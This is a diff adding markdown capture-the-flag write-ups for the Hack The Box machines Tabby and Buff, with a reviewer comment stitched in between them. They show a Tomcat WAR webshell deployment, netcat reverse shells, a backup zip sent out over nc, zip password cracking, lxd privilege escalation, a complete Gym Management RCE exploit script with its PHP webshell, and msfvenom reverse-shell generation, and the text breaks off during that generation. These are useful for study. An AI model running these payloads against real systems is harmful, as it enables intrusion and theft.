+ → file thanksippsec.war
+ thanksippsec.war: Zip archive data, at least v2.0 to extract
+
+
+
+Now that we created our war file, let's upload it and deploy it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+
+
+Now the trick here is that unlike on the Kotarak box, here we only have access to the commandline's **/manager/text** so we're going to upload our war file and deploy it through the commandline thanks to curl:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → curl -u tomcat:\$3cureP4s5w0rd123! http://10.10.10.194:8080/manager/text/deploy\?path\=/webshell\&update;\=true -T thanksippsec.war
+ OK - Deployed application at context path [/webshell]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → curl -u tomcat:\$3cureP4s5w0rd123! http://10.10.10.194:8080/webshell/
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.194] 34800
+ id
+ uid=997(tomcat) gid=997(tomcat) groups=997(tomcat)
+
+
+
+And we got a reverse shell connection! We are now able to execute commands as the tomcat user. Let's first upgrade our shell to a fully interactive TTY:
+
+
+ # check which commands we can use
+
+ which python python3 curl wget bash
+ /usr/bin/python3
+ /usr/bin/curl
+ /usr/bin/wget
+ /usr/bin/bash
+
+ # spawn a TTY with python3's pty module
+
+ python3 -c 'import pty; pty.spawn("/bin/bash")'
+ tomcat@tabby:/var/lib/tomcat9$
+
+ # CTRL Z to background the reverse shell netcat process
+
+ tomcat@tabby:/var/lib/tomcat9$ ^Z
+ [1] + 22233 suspended nc -lvnp 9001
+
+ # set the stty as raw with the -echo flags, then foreground the process
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → stty raw -echo ; fg
+ [1] + 22233 continued nc -lvnp 9001
+
+ # export the TERM and SHELL environment variables, and set the TTY right (for nano /vim stuff)
+
+ export TERM=screen-256color
+ tomcat@tabby:/var/lib/tomcat9$ export SHELL=bash
+ tomcat@tabby:/var/lib/tomcat9$ stty rows 40 columns 200
+ tomcat@tabby:/var/lib/tomcat9$ reset
+
+ # and once the terminal has resetted, we are now in a fully interactive reverse shell!
+
+ tomcat@tabby:/var/lib/tomcat9$ id
+ uid=997(tomcat) gid=997(tomcat) groups=997(tomcat)
+
+
+
+Now from here we can upload linpeas.sh to enumerate the box:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → locate linpeas.sh
+ /home/nothing/HTB/Admirer/linpeas.sh
+ /home/nothing/HTB/OpenAdmin/linpeas.sh
+ /home/nothing/HTB/Postman/linpeas.sh
+ /home/nothing/HTB/Traverxec/linpeas.sh
+ /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ tomcat@tabby:/var/lib/tomcat9$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas.sh
+ --2021-06-02 08:01:09-- http://10.10.14.13:9090/linpeas.sh
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: ‘/tmp/peas.sh’
+
+ /tmp/peas.sh 100%[=============================================================================================================>] 333.85K 699KB/s in 0.5s
+
+ 2021-06-02 08:01:10 (699 KB/s) - ‘/tmp/peas.sh’ saved [341863/341863]
+
+ tomcat@tabby:/var/lib/tomcat9$ chmod +x /tmp/peas.sh
+
+ tomcat@tabby:/var/lib/tomcat9$ /tmp/peas.sh
+
+
+
+` 
+
+Let linpeas.sh run, then as you scroll down you will end up on a certain backup zip file:
+
+
+
+Coincidentally, it seems that the backup zip file is owned by the ash user, and there seems to be a copy of it in the /tmp folder, let's check if they are the same:
+
+
+ tomcat@tabby:/var/lib/tomcat9$ md5sum /var/www/html/files/16162020_backup.zip /tmp/16162020_backup.zip
+ f0a0af346ad4495cfdb01bd5173b0a52 /var/www/html/files/16162020_backup.zip
+ f0a0af346ad4495cfdb01bd5173b0a52 /tmp/16162020_backup.zip
+
+
+
+And indeed they are the same! let's open it locally and see what it contains, we can use netcat to get the zipfile from the box:
+
+
+
+ tomcat@tabby:/tmp$ md5sum 16162020_backup.zip
+ f0a0af346ad4495cfdb01bd5173b0a52 16162020_backup.zip
+
+ tomcat@tabby:/var/lib/tomcat9$ which nc
+ /usr/bin/nc
+
+ tomcat@tabby:/tmp$ cat 16162020_backup.zip | nc 10.10.14.13 9002
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → nc -lvnp 9002 > backup.zip
+ listening on [any] 9002 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.194] 57326
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → md5sum backup.zip
+ f0a0af346ad4495cfdb01bd5173b0a52 backup.zip
+
+
+
+And here we see that the 2 files hashes are identical, this means that we successfully transfered the file back onto our local machine. Let's try to unzip it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → unzip backup.zip
+ Archive: backup.zip
+ creating: var/www/html/assets/
+ [backup.zip] var/www/html/favicon.ico password:
+ password incorrect--reenter:
+ password incorrect--reenter:
+ skipping: var/www/html/favicon.ico incorrect password
+ creating: var/www/html/files/
+ [backup.zip] var/www/html/index.php password:
+
+
+
+But it's password protected, so let's try to crack it using fcrackzip:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → sudo apt install fcrackzip
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → fcrackzip -vuDp /usr/share/wordlists/rockyou.txt backup.zip
+ 'var/www/html/assets/' is not encrypted, skipping
+ found file 'var/www/html/favicon.ico', (size cp/uc 338/ 766, flags 9, chk 7db5)
+ 'var/www/html/files/' is not encrypted, skipping
+ found file 'var/www/html/index.php', (size cp/uc 3255/ 14793, flags 9, chk 5935)
+ found file 'var/www/html/logo.png', (size cp/uc 2906/ 2894, flags 9, chk 5d46)
+ found file 'var/www/html/news.php', (size cp/uc 114/ 123, flags 9, chk 5a7a)
+ found file 'var/www/html/Readme.txt', (size cp/uc 805/ 1574, flags 9, chk 6a8b)
+ checking pw arizon1
+
+ PASSWORD FOUND!!!!: pw == admin@it
+
+
+
+And we found the password! so let's unzip it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → unzip backup.zip
+ Archive: backup.zip
+ [backup.zip] var/www/html/favicon.ico password:
+ inflating: var/www/html/favicon.ico
+ inflating: var/www/html/index.php
+ extracting: var/www/html/logo.png
+ inflating: var/www/html/news.php
+ inflating: var/www/html/Readme.txt
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → tree var
+ var
+ └── www
+ └── html
+ ├── assets
+ ├── favicon.ico
+ ├── files
+ ├── index.php
+ ├── logo.png
+ ├── news.php
+ └── Readme.txt
+
+ 4 directories, 5 files
+
+
+
+The files that were contained are preety much irrelevant, the fact of the matter is that this zip file is supposed to be owned by ash, and we got his potential password. Let's try and see if ash re-used the same password on the box:
+
+
+ tomcat@tabby:/tmp$ su ash
+ Password:
+ ash@tabby:/tmp$ id
+ uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
+ ash@tabby:/tmp$ cat ~/user.txt
+ 04XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to privesc to the ash user, and got the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc we can run linpeas once again:
+
+
+ ash@tabby:/tmp$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas2.sh
+ --2021-06-02 08:19:11-- http://10.10.14.13:9090/linpeas.sh
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: ‘/tmp/peas2.sh’
+
+ /tmp/peas2.sh 100%[=============================================================================================================>] 333.85K 689KB/s in 0.5s
+
+ 2021-06-02 08:19:12 (689 KB/s) - ‘/tmp/peas2.sh’ saved [341863/341863]
+
+ ash@tabby:/tmp$ chmod +x /tmp/peas2.sh
+ ash@tabby:/tmp$ /tmp/peas2.sh
+
+
+
+The difference being that now linpeas is going to try and find the possible paths from the ash user:
+
+
+
+Now here we see that the ash user is part of the lxd group, which can be exploited to get a root shell thanks to a lxd-alpine container:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → git clone https://github.com/saghul/lxd-alpine-builder.git
+ Cloning into 'lxd-alpine-builder'...
+ remote: Enumerating objects: 35, done.
+ remote: Counting objects: 100% (8/8), done.
+ remote: Compressing objects: 100% (8/8), done.
+ remote: Total 35 (delta 2), reused 2 (delta 0), pack-reused 27
+ Receiving objects: 100% (35/35), 21.69 KiB | 1.20 MiB/s, done.
+ Resolving deltas: 100% (8/8), done.
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → cd lxd-alpine-builder
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Tabby/lxd-alpine-builder]
+ → sudo ./build-alpine
+
+ [...]
+
+ Executing busybox-initscripts-3.2-r2.post-install
+ (16/20) Installing scanelf (1.2.8-r0)
+ (17/20) Installing musl-utils (1.2.2-r0)
+ (18/20) Installing libc-utils (0.7.2-r3)
+ (19/20) Installing alpine-keys (2.2-r0)
+ (20/20) Installing alpine-base (3.13.5-r0)
+ Executing busybox-1.32.1-r6.trigger
+ OK: 9 MiB in 20 packages
+
+
+
+Now let's transfer the built tar.gz image onto the box:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Tabby/lxd-alpine-builder]
+ → ls -lash alpine-v3.13-x86_64-20210602_1002.tar.gz
+ 3.2M -rw-r--r-- 1 root root 3.2M Jun 2 10:02 alpine-v3.13-x86_64-20210602_1002.tar.gz
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Tabby/lxd-alpine-builder]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ ash@tabby:/tmp$ wget http://10.10.14.13:9090/alpine-v3.13-x86_64-20210602_1002.tar.gz
+ --2021-06-02 08:24:46-- http://10.10.14.13:9090/alpine-v3.13-x86_64-20210602_1002.tar.gz
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 3256211 (3.1M) [application/gzip]
+ Saving to: ‘alpine-v3.13-x86_64-20210602_1002.tar.gz’
+
+ alpine-v3.13-x86_64-20210602_1002.tar.gz 100%[=============================================================================================================>] 3.10M 570KB/s in 5.5s
+
+ 2021-06-02 08:24:51 (582 KB/s) - ‘alpine-v3.13-x86_64-20210602_1002.tar.gz’ saved [3256211/3256211]
+
+
+
+Say no to all prompts:
+
+
+ ash@tabby:/tmp$ lxd init
+ Would you like to use LXD clustering? (yes/no) [default=no]: no
+ Do you want to configure a new storage pool? (yes/no) [default=yes]: no
+ Would you like to connect to a MAAS server? (yes/no) [default=no]: no
+ Would you like to create a new local network bridge? (yes/no) [default=yes]: no
+ Would you like to configure LXD to use an existing bridge or host interface? (yes/no) [default=no]: no
+ Would you like LXD to be available over the network? (yes/no) [default=no]: no
+ Would you like stale cached images to be updated automatically? (yes/no) [default=yes] no
+ Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: no
+
+ ash@tabby:/tmp$ mv alpine-v3.13-x86_64-20210602_1002.tar.gz alpine.tar.gz
+ ash@tabby:/tmp$ lxc image import /tmp/alpine.tar.gz --alias alpine
+
+ ash@tabby:/tmp$ lxc image list
+ +--------+--------------+--------+----------------------------------------+--------------+-----------+--------+------------------------------+
+ | ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+ +--------+--------------+--------+----------------------------------------+--------------+-----------+--------+------------------------------+
+ | alpine | 2d59dc1f8e1c | no | Alpinelinux 3.8 x86_64 (20210601_2225) | x86_64 | CONTAINER | 1.92MB | Jun 1, 2021 at 10:54pm (UTC) |
+ +--------+--------------+--------+----------------------------------------+--------------+-----------+--------+------------------------------+
+
+
+
+And once your alpine image got imported, we can launch it to get access to the root files on the server:
+
+
+ ash@tabby:/tmp$ lxc init alpine mycontainer -c security.privileged=true
+ Creating mycontainer
+
+ The instance you are starting doesn't have any network attached to it.
+ To create a new network, use: lxc network create
+ To attach a network to an instance, use: lxc network attach
+
+ ash@tabby:/tmp$ lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
+ Device mydevice added to mycontainer
+ ash@tabby:/tmp$ lxc start mycontainer
+ ash@tabby:/tmp$ lxc exec mycontainer /bin/sh
+
+ ~ # id
+ uid=0(root) gid=0(root)
+
+ ~ # cat /mnt/root/root/root.txt
+ 99XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it! We managed to get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
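Review bot: the `lxc image list` output shown right after the import (alias `alpine`, "Alpinelinux 3.8 x86_64 (20210601_2225)", uploaded Jun 1) does not correspond to the file that was just imported, `alpine-v3.13-x86_64-20210602_1002.tar.gz` built on Jun 2, so the listing was either pasted from an earlier session or the import was skipped; re-run `lxc image list` after the `lxc image import` and paste output whose fingerprint and upload date match the tarball. Smaller points in the same hunk: the prose says the credentials are in `conf/tomcat-users.xml`, but the first `curl` against `/usr/share/tomcat9/conf/tomcat-users.xml` returns nothing and only the `/usr/share/tomcat9/etc/tomcat-users.xml` request works, so state that on this Ubuntu tomcat9 package the file lives under `etc/` rather than leaving the empty first response unexplained; the deploy URL reads `\&update;\=true`, which looks like an entity artefact of the intended `path=/webshell&update=true` query string; and in the zip transfer the `cat 16162020_backup.zip | nc 10.10.14.13 9002` sender is shown before the `nc -lvnp 9002 > backup.zip` listener, so reorder them or say the listener has to be started first. Finally, the `<****?xml`, `<****tomcat-users` and similar tokens in the tomcat-users.xml dump are escaping damage; putting that block in a code fence would keep the `<` intact.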
diff --git a/Easy/49.md b/Easy/49.md
new file mode 100644
index 0000000..fa28d68
--- /dev/null
+++ b/Easy/49.md
@@ -0,0 +1,478 @@
+# Buff Writeup
+
+
+
+## Introduction :
+
+Buff is an easy Windows box released back in July 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Buff]
+ → nmap -vvv -p- 10.10.10.198 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 8080/tcp on 10.10.10.198
+ Discovered open port 7680/tcp on 10.10.10.198
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Buff]
+ → nmap -sCV -p8080,7680 10.10.10.198 -Pn
+ Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-02 11:19 CEST
+ Nmap scan report for 10.10.10.198
+ Host is up (0.14s latency).
+
+ PORT STATE SERVICE VERSION
+ 7680/tcp open pando-pub?
+ 8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
+ |_http-open-proxy: Proxy might be redirecting requests
+ |_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
+ |_http-title: mrb3n's Bro Hut
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 66.01 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 8080 running apache from Windows, so let's check it out:
+
+
+
+And upon clicking the contact page, we see that we have a Gym Management Software v1.0 instance, so let's see if there are any exploits for us to use:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Buff]
+ → searchsploit gym management
+ --------------------------------------------------------- ---------------------------------
+ Exploit Title | Path
+ --------------------------------------------------------- ---------------------------------
+ Gym Management System 1.0 - 'id' SQL Injection | php/webapps/48936.txt
+ Gym Management System 1.0 - Authentication Bypass | php/webapps/48940.txt
+ Gym Management System 1.0 - Stored Cross Site Scripting | php/webapps/48941.txt
+ Gym Management System 1.0 - Unauthenticated Remote Code | php/webapps/48506.py
+ --------------------------------------------------------- ---------------------------------
+ Shellcodes: No Results
+
+
+
+Let's use the Unauthenticated RCE python exploit:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Buff]
+ → cp $(locate 48506.py ) .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Buff]
+ → cat 48506.py
+
+ import requests, sys, urllib, re
+ from colorama import Fore, Back, Style
+ requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+ def webshell(SERVER_URL, session):
+ try:
+ WEB_SHELL = SERVER_URL+'upload/kamehameha.php'
+ getdir = {'telepathy': 'echo %CD%'}
+ r2 = session.get(WEB_SHELL, params=getdir, verify=False)
+ status = r2.status_code
+ if status != 200:
+ print Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL
+ r2.raise_for_status()
+ print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
+ cwd = re.findall('[CDEF].*', r2.text)
+ cwd = cwd[0]+"> "
+ term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
+ while True:
+ thought = raw_input(term)
+ command = {'telepathy': thought}
+ r2 = requests.get(WEB_SHELL, params=command, verify=False)
+ status = r2.status_code
+ if status != 200:
+ r2.raise_for_status()
+ response2 = r2.text
+ print(response2)
+ except:
+ print("\r\nExiting.")
+ sys.exit(-1)
+
+ def formatHelp(STRING):
+ return Style.BRIGHT+Fore.RED+STRING+Fore.RESET
+
+ def header():
+ BL = Style.BRIGHT+Fore.GREEN
+ RS = Style.RESET_ALL
+ FR = Fore.RESET
+ SIG = BL+' /\\\n'+RS
+ SIG += Fore.YELLOW+'/vvvvvvvvvvvv '+BL+'\\'+FR+'--------------------------------------,\n'
+ SIG += Fore.YELLOW+'`^^^^^^^^^^^^'+BL+' /'+FR+'============'+Fore.RED+'BOKU'+FR+'====================="\n'
+ SIG += BL+' \/'+RS+'\n'
+ return SIG
+
+ if __name__ == "__main__":
+ print header();
+ if len(sys.argv) != 2:
+ print formatHelp("(+) Usage:\t python %s " % sys.argv[0])
+ print formatHelp("(+) Example:\t python %s 'https://10.0.0.3:443/gym/'" % sys.argv[0])
+ sys.exit(-1)
+ SERVER_URL = sys.argv[1]
+ UPLOAD_DIR = 'upload.php?id=kamehameha'
+ UPLOAD_URL = SERVER_URL + UPLOAD_DIR
+ s = requests.Session()
+ s.get(SERVER_URL, verify=False)
+ PNG_magicBytes = '\x89\x50\x4e\x47\x0d\x0a\x1a'
+ png = {
+ 'file':
+ (
+ 'kaio-ken.php.png',
+ PNG_magicBytes+'\n'+'<****?php echo shell_exec($_GET["telepathy"]); ?>',
+ 'image/png',
+ {'Content-Disposition': 'form-data'}
+ )
+ }
+ fdata = {'pupload': 'upload'}
+ r1 = s.post(url=UPLOAD_URL, files=png, data=fdata, verify=False)
+ webshell(SERVER_URL, s)%
+
+Preety trivial to use, we simply need to give it the URL of the website as an arguement:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Buff]
+ → python 48506.py http://10.10.10.198:8080/
+ /\
+ /vvvvvvvvvvvv \--------------------------------------,
+ `^^^^^^^^^^^^ /============BOKU=====================
+ \/
+
+ [+] Successfully connected to webshell.
+ C:\xampp\htdocs\gym\upload> whoami
+ �PNG
+
+ buff\shaun
+
+ C:\xampp\htdocs\gym\upload> type C:\users\shaun\desktop\user.txt
+ �PNG
+
+ b0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And we got the user flag!
+
+## **Part 3 : Getting Root Access**
+
+
+ C:\xampp\htdocs\gym\upload> netstat -ano | findstr LISTENING
+ �PNG
+
+ TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 956
+ TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
+ TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 5780
+ TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 8608
+ TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 4080
+ TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 520
+ TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1060
+ TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1532
+ TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2232
+ TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 664
+ TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 684
+ TCP 10.10.10.198:139 0.0.0.0:0 LISTENING 4
+ TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 5496
+ TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 5364
+ TCP [::]:135 [::]:0 LISTENING 956
+ TCP [::]:445 [::]:0 LISTENING 4
+ TCP [::]:7680 [::]:0 LISTENING 8608
+ TCP [::]:8080 [::]:0 LISTENING 4080
+ TCP [::]:49664 [::]:0 LISTENING 520
+ TCP [::]:49665 [::]:0 LISTENING 1060
+ TCP [::]:49666 [::]:0 LISTENING 1532
+ TCP [::]:49667 [::]:0 LISTENING 2232
+ TCP [::]:49668 [::]:0 LISTENING 664
+ TCP [::]:49669 [::]:0 LISTENING 684
+
+
+
+Here we see that there's a MySQL instance running on port 3306 and something else on port 8888. This was a hint to a CloudMe Sync service [exploit](https://www.exploit-db.com/exploits/44470):
+
+Basically the CloudMe Sync software isn't compiled with any protections enabled like ASLR / DEP and is thus vulnerable to buffer overflow attacks, Although we need to access the port and for now it's still only accessible from the host machine's localhost, So we can make use of a tool named [xc](../Tools/xc/index.md) to port forward the vulnerable port 8888 we need:
+
+Now in order to privesc the box we need to look at the opened ports:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Buff]
+ → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASbat/winPEAS.bat .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Buff]
+ → sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support .
+ [sudo] password for nothing:
+ Impacket v0.9.23.dev1+20210519.170900.2f5c2476 - Copyright 2020 SecureAuth Corporation
+
+ usage: smbserver.py [-h] [-comment COMMENT] [-username USERNAME] [-password PASSWORD] [-hashes LMHASH:NTHASH] [-ts] [-debug] [-ip INTERFACE_ADDRESS] [-port PORT] [-smb2support] shareName sharePath
+ smbserver.py: error: the following arguments are required: sharePath
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Buff]
+ → sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support test .
+ Impacket v0.9.23.dev1+20210519.170900.2f5c2476 - Copyright 2020 SecureAuth Corporation
+
+ [*] Config file parsed
+ [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
+ [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
+ [*] Config file parsed
+ [*] Config file parsed
+ [*] Config file parsed
+
+ **[*] Incoming connection (10.10.10.198,49758)**
+ [*] AUTHENTICATE_MESSAGE (BUFF\shaun,BUFF)
+ [*] User BUFF\shaun authenticated successfully
+ [*] shaun::BUFF:aaaaaaaaaaaaaaaa:5d8852bb8433b59137009bf40b34891a:0101000000000000007dcc199e57d701d4e99eb4a5f42e7700000000010010005a00530056006d005a00760055006d00030010005a00530056006d005a00760055006d00020010007400660062005a004100750042006100040010007400660062005a00410075004200610007000800007dcc199e57d701060004000200000008003000300000000000000000000000002000009b16b72cf619545bf4c9fc0e0e2180a61bf08182e18b155b2f091defe359fc140a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310033000000000000000000
+ [*] Connecting Share(1:IPC$)
+ [*] Connecting Share(2:test)
+
+ C:\xampp\htdocs\gym\upload> copy \\10.10.14.13\test\xc.exe xc.exe
+ �PNG
+
+ 1 file(s) copied.
+
+
+Now let's get a reverse xc shell connection:
+
+
+ C:\xampp\htdocs\gym\upload> xc.exe 10.10.14.13 9005
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/75 ] [~/HTB/Buff]
+ → ./xc -l -p 9005
+
+ __ _____
+ \ \/ / __|
+ > <****(__
+ /_/\_\___| by @xct_de
+ build: QUnVVFdLYEkibcKx
+
+ 2021/06/02 15:16:06 Listening on :9005
+ 2021/06/02 15:16:06 Waiting for connections...
+ 2021/06/02 15:18:28 Connection from 10.10.10.198:49764
+ 2021/06/02 15:18:28 Stream established
+
+ [*] Auto-Plugins:
+ [xc: C:\xampp\htdocs\gym\upload]: !lfwd
+ Usage: !lfwd <****localport>****remoteaddr> <****remoteport> (opens local port)
+
+ [xc: C:\xampp\htdocs\gym\upload]: !lfwd 8888 127.0.0.1 8888
+ [xc: C:\xampp\htdocs\gym\upload]: !lfwd 3306 127.0.0.1 3306
+
+ [xc: C:\xampp\htdocs\gym\upload]: !lsfwd
+ Active Port Forwarding:
+ [0] Listening on 10.10.14.13:8888, Traffic redirect to 10.10.10.198 (127.0.0.1:8888)
+ [1] Listening on 10.10.14.13:3306, Traffic redirect to 10.10.10.198 (127.0.0.1:3306)
+
+Here we port forward the port 8888 and 3306 to be accessible from our machine so let's try to login onto mysql:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/76 ] [~/HTB/Buff]
+ → ss -lnpt
+ State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
+ LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
+ LISTEN 0 5 127.0.0.1:6600 0.0.0.0:* users:(("mpd",pid=163090,fd=10))
+ LISTEN 0 128 [::]:22 [::]:*
+ LISTEN 0 4096 *:8888 *:* users:(("xc",pid=4058130,fd=8))
+ LISTEN 0 50 [::ffff:127.0.0.1]:4701 *:* users:(("java",pid=52048,fd=25))
+ LISTEN 0 4096 *:3306 *:* users:(("xc",pid=4058130,fd=9))
+ LISTEN 0 4096 *:9005 *:* users:(("xc",pid=4058130,fd=3))
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/76 ] [~/HTB/Buff]
+ → nmap -sCV -p 8888,3306 127.0.0.1
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-02 16:25 CEST
+ Nmap scan report for localhost (127.0.0.1)
+ Host is up (0.000059s latency).
+
+ PORT STATE SERVICE VERSION
+ 3306/tcp open tcpwrapped
+ | mysql-info:
+ | Protocol: 10
+ | Version: 5.5.5-10.4.11-MariaDB
+ | Thread ID: 58
+ | Capabilities flags: 63486
+ | Some Capabilities: Support41Auth, DontAllowDatabaseTableColumn, FoundRows, InteractiveClient, ConnectWithDatabase, Speaks41ProtocolNew, Speaks41ProtocolOld, SupportsTransactions, ODBCClient, LongColumnFlag, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, SupportsCompression, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
+ | Status: Autocommit
+ | Salt: sq^cT[LKs$RT01C?ScuF
+ |_ Auth Plugin Name: mysql_native_password
+ |_ssl-date: ERROR: Script execution failed (use -d to debug)
+ |_tls-alpn: ERROR: Script execution failed (use -d to debug)
+ 8888/tcp open mysql MySQL 5.5.5-10.4.11-MariaDB
+ |_mysql-info: ERROR: Script execution failed (use -d to debug)
+ |_ssl-date: ERROR: Script execution failed (use -d to debug)
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 21.24 seconds
+
+ [ 10.10.14.13/23 ] [ /dev/pts/81 ] [~]
+ → mysql -u root -p -h 127.0.0.1
+ Enter password:
+ Welcome to the MariaDB monitor. Commands end with ; or \g.
+ Your MariaDB connection id is 54
+ Server version: 10.4.11-MariaDB mariadb.org binary distribution
+
+ Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
+
+ Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
+
+ MariaDB [(none)]>
+
+
+
+And here we see that we have been able to get onto mysql as the root user without any password!
+
+Now that's done, we can generate the payload we want to put into our modified [exploit](https://www.exploit-db.com/exploits/48389) using msfvenom, going from the previous payload **msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python** to the following:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/78 ] [~/HTB/Buff]
+ → **msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.13 LPORT=443 -b '\x00\x0A\x0D' -f python -v payload**
+ [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
+ Found 11 compatible encoders
+ Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
